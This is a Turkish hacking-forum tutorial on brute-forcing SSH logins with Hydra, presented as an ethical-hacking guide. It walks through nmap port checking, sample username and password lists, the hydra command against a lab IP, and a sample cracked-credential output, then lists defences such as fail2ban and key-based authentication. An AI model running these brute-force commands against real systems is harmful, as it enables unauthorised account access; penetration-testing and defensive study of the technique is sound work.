Hoşgeldin Misafir

Hydra ile SSH Brute Force Saldırısı: Etik Hacking Rehberi

Sarraf

Sarraf

THS-SARRAF
Belarus
12 Ara 2020
2,113 Mesaj
TIM Görevleri
1

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Merhabalar!
Ben @Sarraf, Lojistik grup adına paylaşılan Hydra ile SSH Brute Force Saldırısı: Etik Hacking Rehberi makalesinde sizi görmekten mutluyum.

Eğer hazırsanız, başlayalım!

8je2yed.jpg

Hydra ile SSH Brute Force Saldırısı: Etik Hacking Rehberi

Hydra Nedir?

Hydra, çeşitli protokoller (FTP, SSH, HTTP, Telnet, RDP vb.) üzerinde brute-force saldırıları yapabilen açık kaynaklı bir araçtır. Özellikle parola güvenliğini test etmek isteyen sızma testi uzmanları tarafından kullanılır.

Gerekli Araçlar

  • Kali Linux (veya herhangi bir Linux dağıtımı)
  • Hydra (genellikle Kali'de yüklü gelir)
  • Hedef SSH servisi (izinli bir test sistemi)

Hedefin SSH Servisini Doğrulama

Öncelikle hedef IP’de SSH servisinin çalıştığını doğrulayalım:
Kod:
bash
nmap -p 22 <hedef_ip>

Çıktı şöyle olmalıdır:
Kod:
arduino
22/tcp open  ssh

Kullanıcı Adı ve Parola Listeleri

Brute-force işlemi için kullanıcı adı ve parola listeleri gereklidir. Örnek:
Kod:
bash
nano users.txt
admin
root
test

Kod:
bash
nano passwords.txt
123456
password
admin123

Bu dosyalar genellikle /usr/share/wordlists dizininde de hazır bulunur (örneğin: rockyou.txt).

Hydra ile SSH Brute-Force Saldırısı

Komut örneği:
Kod:
bash
hydra -L users.txt -P passwords.txt ssh://<hedef_ip>

Açıklaması:

  • -L: Kullanıcı adı listesi
  • -P: Parola listesi
  • ssh://: Protokol
  • <hedef_ip>: Hedef sistemin IP adresi

Örnek:

Kod:
bash
hydra -L users.txt -P passwords.txt ssh://192.168.1.10

Başarılı Sonuç Çıktısı

Hydra başarılı bir eşleşme bulduğunda aşağıdaki gibi bir çıktı verir:
Kod:
css
[22][ssh] host: 192.168.1.10   login: root   password: admin123

Bu noktada sisteminize etik kurallar çerçevesinde erişim sağlanabilir.

Güvenlik Önlemleri

Sistem yöneticileri brute-force saldırılarına karşı şu önlemleri almalıdır:

  • SSH için fail2ban veya benzeri araçlarla brute-force koruması
  • Karmaşık ve uzun parolalar
  • SSH anahtar doğrulaması (key-based auth)
  • SSH portunu değiştirmek
  • IP erişim kısıtlamaları

Hydra, güçlü bir brute-force aracıdır ve sistemlerin parola güvenliğini test etmek için oldukça etkilidir. Ancak sorumlu ve etik kullanım en önemli kuraldır. Her zaman sadece izinli sistemler üzerinde test yapılmalıdır.

Makalemizi okuduğunuz için teşekkür ederiz!
Yorum yapmayı ve beğenmeyi unutmayın!



LOJİSTİK TİM SUNDU
btn1pyf.png